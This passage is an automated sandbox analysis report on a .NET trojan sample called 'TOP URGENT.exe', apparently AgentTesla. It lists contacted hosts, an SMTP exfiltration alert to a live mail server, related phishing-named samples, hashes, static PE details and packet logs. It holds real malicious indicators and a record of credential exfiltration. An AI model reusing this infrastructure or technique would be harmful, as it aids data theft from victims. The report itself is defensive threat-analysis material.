                                                http://www.urwpp.deDPleaseTOP URGENT.exe, 00000000.00000002.248442189.0000000006EC2000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.zhongyicts.com.cnTOP URGENT.exe, 00000000.00000002.248442189.0000000006EC2000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.sakkal.comTOP URGENT.exe, 00000000.00000002.248442189.0000000006EC2000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://api.ipify.org%MSBuild.exe, 00000004.00000002.501627918.0000000002981000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                		low
                                                https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zipTOP URGENT.exe, 00000000.00000002.245468332.0000000003D89000.00000004.00000001.sdmp, MSBuild.exe, 00000004.00000002.493480561.0000000000402000.00000040.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown

                                                Contacted IPs

                                                • No. of IPs < 25%
                                                • 25% < No. of IPs < 50%
                                                • 50% < No. of IPs < 75%
                                                • 75% < No. of IPs

                                                Public

                                                IPDomainCountryFlagASNASN NameMalicious
                                                208.91.199.225
                                                		us2.smtp.mailhostbox.comUnited States
                                                		394695PUBLIC-DOMAIN-REGISTRYUSfalse

                                                General Information

                                                Joe Sandbox Version:33.0.0 White Diamond
                                                Analysis ID:483922
                                                Start date:15.09.2021
                                                Start time:16:20:28
                                                Joe Sandbox Product:CloudBasic
                                                Overall analysis duration:0h 8m 54s
                                                Hypervisor based Inspection enabled:false
                                                Report type:full
                                                Sample file name:TOP URGENT.exe
                                                Cookbook file name:default.jbs
                                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                Number of analysed new started processes analysed:28
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:0
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • HDC enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Detection:MAL
                                                Classification:mal100.spre.troj.adwa.spyw.evad.winEXE@3/2@2/1
                                                EGA Information:Failed
                                                HDC Information:Failed
                                                HCA Information:
                                                • Successful, ratio: 100%
                                                • Number of executed functions: 101
                                                • Number of non-executed functions: 26
                                                Cookbook Comments:
                                                • Adjust boot time
                                                • Enable AMSI
                                                • Found application associated with file extension: .exe
                                                Warnings:
                                                Show All
                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WerFault.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                • Excluded IPs from analysis (whitelisted): 2.20.86.117, 23.35.236.56, 20.82.209.183, 13.107.4.50, 20.54.110.249, 40.112.88.60, 23.216.77.209, 23.216.77.208, 23.203.67.116, 23.203.69.124, 20.189.173.22
                                                • Excluded domains from analysis (whitelisted): onedsblobprdwus17.westus.cloudapp.azure.com, store-images.s-microsoft.com-c.edgekey.net, b1ns.c-0001.c-msedge.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, e15275.g.akamaiedge.net, arc.msn.com, cdn.onenote.net.edgekey.net, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, wildcard.weather.microsoft.com.edgekey.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com, prod.fs.microsoft.com.akadns.net, cdn.onenote.net, b1ns.au-msedge.net, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, tile-service.weather.microsoft.com, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, c-0001.c-msedge.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, e1553.dspg.akamaiedge.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                • Not all processes where analyzed, report is missing behavior information
                                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                • VT rate limit hit for: /opt/package/joesandbox/database/analysis/483922/sample/TOP URGENT.exe

                                                Simulations

                                                Behavior and APIs

                                                TimeTypeDescription
                                                16:21:33API Interceptor1x Sleep call for process: TOP URGENT.exe modified
                                                16:21:50API Interceptor675x Sleep call for process: MSBuild.exe modified

                                                Joe Sandbox View / Context

                                                IPs

                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                208.91.199.225HSBc20210216B1.exeGet hashmaliciousBrowse
                                                  POINQUIRYRFQ676889.exeGet hashmaliciousBrowse
                                                    qiQvJ3jGU2.exeGet hashmaliciousBrowse
                                                      S121093 - RE Wire Transfer - 8,000.00 USD - deposit.exeGet hashmaliciousBrowse
                                                        RFQ#MAT#Quotation No. 20077253.exeGet hashmaliciousBrowse
                                                          Payment Advice 09092021 HSBC096754BK56CBREF.exeGet hashmaliciousBrowse
                                                            PaymentReceipt.docGet hashmaliciousBrowse
                                                              Swift Transfer Copy mt103_PDF.exeGet hashmaliciousBrowse
                                                                SecuriteInfo.com.MachineLearning.Anomalous.94.8891.exeGet hashmaliciousBrowse
                                                                  PURCHASE ORDER 2021.exeGet hashmaliciousBrowse
                                                                    L9d4lSc9LF4Yv1t.exeGet hashmaliciousBrowse
                                                                      P.O_345.exeGet hashmaliciousBrowse
                                                                        revised order-number 3A6.exeGet hashmaliciousBrowse
                                                                          QUOTATION -PDF-SCAN-COPY.exeGet hashmaliciousBrowse
                                                                            Urgent RFQ #2105031.pdf.exeGet hashmaliciousBrowse
                                                                              Listed Items Order.exeGet hashmaliciousBrowse
                                                                                order-2021-PO # 0834.xlsxGet hashmaliciousBrowse
                                                                                  qPlRnI13fW.exeGet hashmaliciousBrowse
                                                                                    PO.exeGet hashmaliciousBrowse
                                                                                      VOn3J2hVHa.exeGet hashmaliciousBrowse

                                                                                        Domains

                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                        us2.smtp.mailhostbox.comHSBc20210216B1.exeGet hashmaliciousBrowse
                                                                                        • 208.91.199.225
                                                                                        POINQUIRYRFQ676889.exeGet hashmaliciousBrowse
                                                                                        • 208.91.199.223
                                                                                        PO- 45020032 Juv#U00e9l AS.exeGet hashmaliciousBrowse
                                                                                        • 208.91.199.224
                                                                                        48q74tT5IK.exeGet hashmaliciousBrowse
                                                                                        • 208.91.199.224
                                                                                        qiQvJ3jGU2.exeGet hashmaliciousBrowse
                                                                                        • 208.91.199.225
                                                                                        S121093 - RE Wire Transfer - 8,000.00 USD - deposit.exeGet hashmaliciousBrowse
                                                                                        • 208.91.199.224
                                                                                        Final Sept Order #0921.exeGet hashmaliciousBrowse
                                                                                        • 208.91.199.224
                                                                                        DHL Express Invoice.exeGet hashmaliciousBrowse
                                                                                        • 208.91.198.143
                                                                                        ee5s192YZ34Ybve.exeGet hashmaliciousBrowse
                                                                                        • 208.91.199.223
                                                                                        Payment Advice 09092021 HSBC096754BK56CBREF.exeGet hashmaliciousBrowse
                                                                                        • 208.91.199.224
                                                                                        sapa list.docGet hashmaliciousBrowse
                                                                                        • 208.91.198.143
                                                                                        RFQ#MAT#Quotation No. 20077253.exeGet hashmaliciousBrowse
                                                                                        • 208.91.199.225
                                                                                        04142021_10RD0207S0N0000,pdf.exeGet hashmaliciousBrowse
                                                                                        • 208.91.199.223
                                                                                        HY19071 PI.exeGet hashmaliciousBrowse
                                                                                        • 208.91.198.143
                                                                                        PO_Contract_ANR07152112_20210715181907__110.exeGet hashmaliciousBrowse
                                                                                        • 208.91.198.143
                                                                                        RFQ-#80986-3580.exeGet hashmaliciousBrowse
                                                                                        • 208.91.199.224
                                                                                        Bank swift copy.exeGet hashmaliciousBrowse
                                                                                        • 208.91.199.224
                                                                                        i9fnXDoul7.exeGet hashmaliciousBrowse
                                                                                        • 208.91.199.225
                                                                                        Shipping Doc_968018592077_pdf.exeGet hashmaliciousBrowse
                                                                                        • 208.91.198.143
                                                                                        AWB_968018592077_Invoice_pdf.exeGet hashmaliciousBrowse
                                                                                        • 208.91.198.143

                                                                                        ASN

                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                        PUBLIC-DOMAIN-REGISTRYUSHSBc20210216B1.exeGet hashmaliciousBrowse
                                                                                        • 208.91.199.225
                                                                                        POINQUIRYRFQ676889.exeGet hashmaliciousBrowse
                                                                                        • 208.91.199.223
                                                                                        PO- 45020032 Juv#U00e9l AS.exeGet hashmaliciousBrowse
                                                                                        • 208.91.199.224
                                                                                        Qoutation for Strips.docGet hashmaliciousBrowse
                                                                                        • 162.215.241.145
                                                                                        48q74tT5IK.exeGet hashmaliciousBrowse
                                                                                        • 208.91.199.224
                                                                                        qiQvJ3jGU2.exeGet hashmaliciousBrowse
                                                                                        • 208.91.199.225
                                                                                        S121093 - RE Wire Transfer - 8,000.00 USD - deposit.exeGet hashmaliciousBrowse
                                                                                        • 208.91.199.224
                                                                                        angelzx.exeGet hashmaliciousBrowse
                                                                                        • 162.215.241.145
                                                                                        Final Sept Order #0921.exeGet hashmaliciousBrowse
                                                                                        • 208.91.199.224
                                                                                        PO KV18RE001-A5193.docGet hashmaliciousBrowse
                                                                                        • 199.79.62.16
                                                                                        DHL Express Invoice.exeGet hashmaliciousBrowse
                                                                                        • 208.91.198.143
                                                                                        0zWKZlSOqL.exeGet hashmaliciousBrowse
                                                                                        • 199.79.62.16
                                                                                        ee5s192YZ34Ybve.exeGet hashmaliciousBrowse
                                                                                        • 208.91.199.224
                                                                                        Payment advice_103.exeGet hashmaliciousBrowse
                                                                                        • 199.79.62.145
                                                                                        QUOTATION.exeGet hashmaliciousBrowse
                                                                                        • 162.215.249.19
                                                                                        diagram-595.docGet hashmaliciousBrowse
                                                                                        • 116.206.105.115
                                                                                        Payment Advice 09092021 HSBC096754BK56CBREF.exeGet hashmaliciousBrowse
                                                                                        • 208.91.199.224
                                                                                        LJUNGBY QUOTATION.docGet hashmaliciousBrowse
                                                                                        • 162.215.241.145
                                                                                        TPL020321.docGet hashmaliciousBrowse
                                                                                        • 162.215.241.145
                                                                                        sapa list.docGet hashmaliciousBrowse
                                                                                        • 208.91.198.143

                                                                                        JA3 Fingerprints

                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                        bd0bf25947d4a37404f0424edf4db9ad4GjwZxgraf.exeGet hashmaliciousBrowse
                                                                                        • 20.190.160.131
                                                                                        hWEV7WHuSm.exeGet hashmaliciousBrowse
                                                                                        • 20.190.160.131
                                                                                        Wire Payment-remittance#.htmlGet hashmaliciousBrowse
                                                                                        • 20.190.160.131
                                                                                        securemessage.htmGet hashmaliciousBrowse
                                                                                        • 20.190.160.131
                                                                                        oGgH8vgU0Z.exeGet hashmaliciousBrowse
                                                                                        • 20.190.160.131
                                                                                        btweb_installer.exeGet hashmaliciousBrowse
                                                                                        • 20.190.160.131
                                                                                        codes.zip.exeGet hashmaliciousBrowse
                                                                                        • 20.190.160.131
                                                                                        r6.zip.exeGet hashmaliciousBrowse
                                                                                        • 20.190.160.131
                                                                                        installer_20f7d5a8ce373.exeGet hashmaliciousBrowse
                                                                                        • 20.190.160.131
                                                                                        eQjZ5OS5m5.exeGet hashmaliciousBrowse
                                                                                        • 20.190.160.131
                                                                                        vape_all_versions.zip.exeGet hashmaliciousBrowse
                                                                                        • 20.190.160.131
                                                                                        script_hack_412.zip.exeGet hashmaliciousBrowse
                                                                                        • 20.190.160.131
                                                                                        DesktopCentralAgent.exeGet hashmaliciousBrowse
                                                                                        • 20.190.160.131
                                                                                        orbi-valorant-injector.exeGet hashmaliciousBrowse
                                                                                        • 20.190.160.131
                                                                                        Agenda1.docxGet hashmaliciousBrowse
                                                                                        • 20.190.160.131
                                                                                        SecuriteInfo.com.BackDoor.Rat.281.18292.exeGet hashmaliciousBrowse
                                                                                        • 20.190.160.131
                                                                                        FragCache Hack v47.zip.exeGet hashmaliciousBrowse
                                                                                        • 20.190.160.131
                                                                                        DesktopCentralAgent.exeGet hashmaliciousBrowse
                                                                                        • 20.190.160.131
                                                                                        eBay-invoice-2195921.vbsGet hashmaliciousBrowse
                                                                                        • 20.190.160.131

                                                                                        Dropped Files

                                                                                        No context

                                                                                        Created / dropped Files

                                                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\TOP URGENT.exe.log
                                                                                        Process:C:\Users\user\Desktop\TOP URGENT.exe
                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):1216
                                                                                        Entropy (8bit):5.355304211458859
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
                                                                                        MD5:FED34146BF2F2FA59DCF8702FCC8232E
                                                                                        SHA1:B03BFEA175989D989850CF06FE5E7BBF56EAA00A
                                                                                        SHA-256:123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
                                                                                        SHA-512:1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
                                                                                        Malicious:true
                                                                                        Reputation:high, very likely benign file
                                                                                        Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                                                                        C:\Windows\System32\drivers\etc\hosts
                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                        Category:modified
                                                                                        Size (bytes):11
                                                                                        Entropy (8bit):2.663532754804255
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:iLE:iLE
                                                                                        MD5:B24D295C1F84ECBFB566103374FB91C5
                                                                                        SHA1:6A750D3F8B45C240637332071D34B403FA1FF55A
                                                                                        SHA-256:4DC7B65075FBC5B5421551F0CB814CAFDC8CACA5957D393C222EE388B6F405F4
                                                                                        SHA-512:9BE279BFA70A859608B50EF5D30BF2345F334E5F433C410EA6A188DCAB395BFF50C95B165177E59A29261464871C11F903A9ECE55B2D900FE49A9F3C49EB88FA
                                                                                        Malicious:true
                                                                                        Reputation:high, very likely benign file
                                                                                        Preview: ..127.0.0.1

                                                                                        Static File Info

                                                                                        General

                                                                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Entropy (8bit):7.470825518995194
                                                                                        TrID:
                                                                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                        • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                        • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                        File name:TOP URGENT.exe
                                                                                        File size:713216
                                                                                        MD5:3af20ee616d2d9c806d27a3c245d4d7b
                                                                                        SHA1:f4448544d0fd560be3a8c1e6ff46670251785267
                                                                                        SHA256:c810e257ac876cb505d076efee941037f5f9fd11464a4af8515d0fbac61509b1
                                                                                        SHA512:b1e98284ddc4e4ffb2742818e4a38c172d255a6922bd058b29f0fa0071c4564268e7faa967b6de4dc8713f322bf904afb801f58eee17d9d1e240f18f12b920ba
                                                                                        SSDEEP:12288:i7kWHCM2K4CKI/yzQs2TaIpI0iJWRUB1acpCAIWoAdLekQNED0aoV5I:CE3CfMIpI0iJyUBnuW/vcEoaoV5I
                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...X.Aa..............0..r...n........... ........@.. .......................@............@................................

                                                                                        File Icon

                                                                                        Icon Hash:f1f0f4d0eecccc71

                                                                                        Static PE Info

                                                                                        General

                                                                                        Entrypoint:0x4a90e2
                                                                                        Entrypoint Section:.text
                                                                                        Digitally signed:false
                                                                                        Imagebase:0x400000
                                                                                        Subsystem:windows gui
                                                                                        Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                                        DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                                        Time Stamp:0x6141B258 [Wed Sep 15 08:44:08 2021 UTC]
                                                                                        TLS Callbacks:
                                                                                        CLR (.Net) Version:v4.0.30319
                                                                                        OS Version Major:4
                                                                                        OS Version Minor:0
                                                                                        File Version Major:4
                                                                                        File Version Minor:0
                                                                                        Subsystem Version Major:4
                                                                                        Subsystem Version Minor:0
                                                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                        Entrypoint Preview

                                                                                        Instruction
                                                                                        jmp dword ptr [00402000h]
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al

                                                                                        Data Directories

                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0xa90900x4f.text
                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0xaa0000x6b90.rsrc
                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0xb20000xc.reloc
                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                        Sections

                                                                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                        .text0x20000xa70e80xa7200False0.825526189697data7.54096955911IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                        .rsrc0xaa0000x6b900x6c00False0.442672164352data5.09315736514IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                        .reloc0xb20000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                        Resources

                                                                                        NameRVASizeTypeLanguageCountry
                                                                                        RT_ICON0xaa2000x668data
                                                                                        RT_ICON0xaa8780x2e8dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 1953594267, next used block 28725
                                                                                        RT_ICON0xaab700x128GLS_BINARY_LSB_FIRST
                                                                                        RT_ICON0xaaca80xea8data
                                                                                        RT_ICON0xabb600x8a8dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0
                                                                                        RT_ICON0xac4180x568GLS_BINARY_LSB_FIRST
                                                                                        RT_ICON0xac9900x25a8data
                                                                                        RT_ICON0xaef480x10a8data
                                                                                        RT_ICON0xb00000x468GLS_BINARY_LSB_FIRST
                                                                                        RT_GROUP_ICON0xb04780x84data
                                                                                        RT_VERSION0xb050c0x484data
                                                                                        RT_MANIFEST0xb09a00x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                                                        Imports

                                                                                        DLLImport
                                                                                        mscoree.dll_CorExeMain

                                                                                        Version Infos

                                                                                        DescriptionData
                                                                                        Translation0x0000 0x04b0
                                                                                        LegalCopyrightCopyright 2008 - 2010
                                                                                        Assembly Version1.3.0.0
                                                                                        InternalNameRuntimeFeatu.exe
                                                                                        FileVersion1.3.0.0
                                                                                        CompanyNameWHC
                                                                                        LegalTrademarks
                                                                                        CommentsA little Tool where you can check the stats of your RYL - Risk Your Life - characters. Ruins of War version.
                                                                                        ProductNameRYL Character Tool - RoW EU version
                                                                                        ProductVersion1.3.0.0
                                                                                        FileDescriptionRYL Character Tool - RoW EU version
                                                                                        OriginalFilenameRuntimeFeatu.exe

                                                                                        Network Behavior

                                                                                        Snort IDS Alerts

                                                                                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                        09/15/21-16:23:28.117425TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49820587192.168.2.3208.91.199.225

                                                                                        Network Port Distribution

                                                                                        TCP Packets

                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                        Sep 15, 2021 16:21:20.070561886 CEST49678443192.168.2.3204.79.197.200
                                                                                        Sep 15, 2021 16:21:20.070636034 CEST49678443192.168.2.3204.79.197.200
                                                                                        Sep 15, 2021 16:21:20.070693016 CEST49678443192.168.2.3204.79.197.200
                                                                                        Sep 15, 2021 16:21:20.070729017 CEST49678443192.168.2.3204.79.197.200
                                                                                        Sep 15, 2021 16:21:20.070776939 CEST49678443192.168.2.3204.79.197.200
                                                                                        Sep 15, 2021 16:21:20.070801973 CEST49678443192.168.2.3204.79.197.200
                                                                                        Sep 15, 2021 16:21:20.070821047 CEST49678443192.168.2.3204.79.197.200
                                                                                        Sep 15, 2021 16:21:20.070857048 CEST49678443192.168.2.3204.79.197.200
                                                                                        Sep 15, 2021 16:21:20.070875883 CEST49678443192.168.2.3204.79.197.200
                                                                                        Sep 15, 2021 16:21:20.070890903 CEST49678443192.168.2.3204.79.197.200
                                                                                        Sep 15, 2021 16:21:20.087532997 CEST44349678204.79.197.200192.168.2.3
                                                                                        Sep 15, 2021 16:21:20.087594032 CEST44349678204.79.197.200192.168.2.3
                                                                                        Sep 15, 2021 16:21:20.087610960 CEST44349678204.79.197.200192.168.2.3
                                                                                        Sep 15, 2021 16:21:20.087619066 CEST44349678204.79.197.200192.168.2.3
                                                                                        Sep 15, 2021 16:21:20.087630987 CEST44349678204.79.197.200192.168.2.3
                                                                                        Sep 15, 2021 16:21:20.087641954 CEST44349678204.79.197.200192.168.2.3
                                                                                        Sep 15, 2021 16:21:20.087652922 CEST44349678204.79.197.200192.168.2.3
                                                                                        Sep 15, 2021 16:21:20.087673903 CEST44349678204.79.197.200192.168.2.3
                                                                                        Sep 15, 2021 16:21:20.087688923 CEST44349678204.79.197.200192.168.2.3
                                                                                        Sep 15, 2021 16:21:20.087706089 CEST44349678204.79.197.200192.168.2.3
                                                                                        Sep 15, 2021 16:21:20.087718010 CEST44349678204.79.197.200192.168.2.3
                                                                                        Sep 15, 2021 16:21:20.087732077 CEST44349678204.79.197.200192.168.2.3
                                                                                        Sep 15, 2021 16:21:20.087747097 CEST44349678204.79.197.200192.168.2.3
                                                                                        Sep 15, 2021 16:21:20.087755919 CEST44349678204.79.197.200192.168.2.3
                                                                                        Sep 15, 2021 16:21:20.087764025 CEST44349678204.79.197.200192.168.2.3
                                                                                        Sep 15, 2021 16:21:20.087774038 CEST44349678204.79.197.200192.168.2.3
                                                                                        Sep 15, 2021 16:21:20.087783098 CEST44349678204.79.197.200192.168.2.3
                                                                                        Sep 15, 2021 16:21:20.087800980 CEST44349678204.79.197.200192.168.2.3
                                                                                        Sep 15, 2021 16:21:20.087819099 CEST44349678204.79.197.200192.168.2.3
                                                                                        Sep 15, 2021 16:21:20.087832928 CEST44349678204.79.197.200192.168.2.3
                                                                                        Sep 15, 2021 16:21:20.087848902 CEST44349678204.79.197.200192.168.2.3
                                                                                        Sep 15, 2021 16:21:20.087862015 CEST44349678204.79.197.200192.168.2.3
                                                                                        Sep 15, 2021 16:21:20.087876081 CEST44349678204.79.197.200192.168.2.3
                                                                                        Sep 15, 2021 16:21:20.087884903 CEST44349678204.79.197.200192.168.2.3
                                                                                        Sep 15, 2021 16:21:20.087898016 CEST44349678204.79.197.200192.168.2.3
                                                                                        Sep 15, 2021 16:21:20.087912083 CEST44349678204.79.197.200192.168.2.3
                                                                                        Sep 15, 2021 16:21:20.087925911 CEST44349678204.79.197.200192.168.2.3
                                                                                        Sep 15, 2021 16:21:20.087939024 CEST44349678204.79.197.200192.168.2.3
                                                                                        Sep 15, 2021 16:21:20.087953091 CEST44349678204.79.197.200192.168.2.3
                                                                                        Sep 15, 2021 16:21:20.087980986 CEST44349678204.79.197.200192.168.2.3
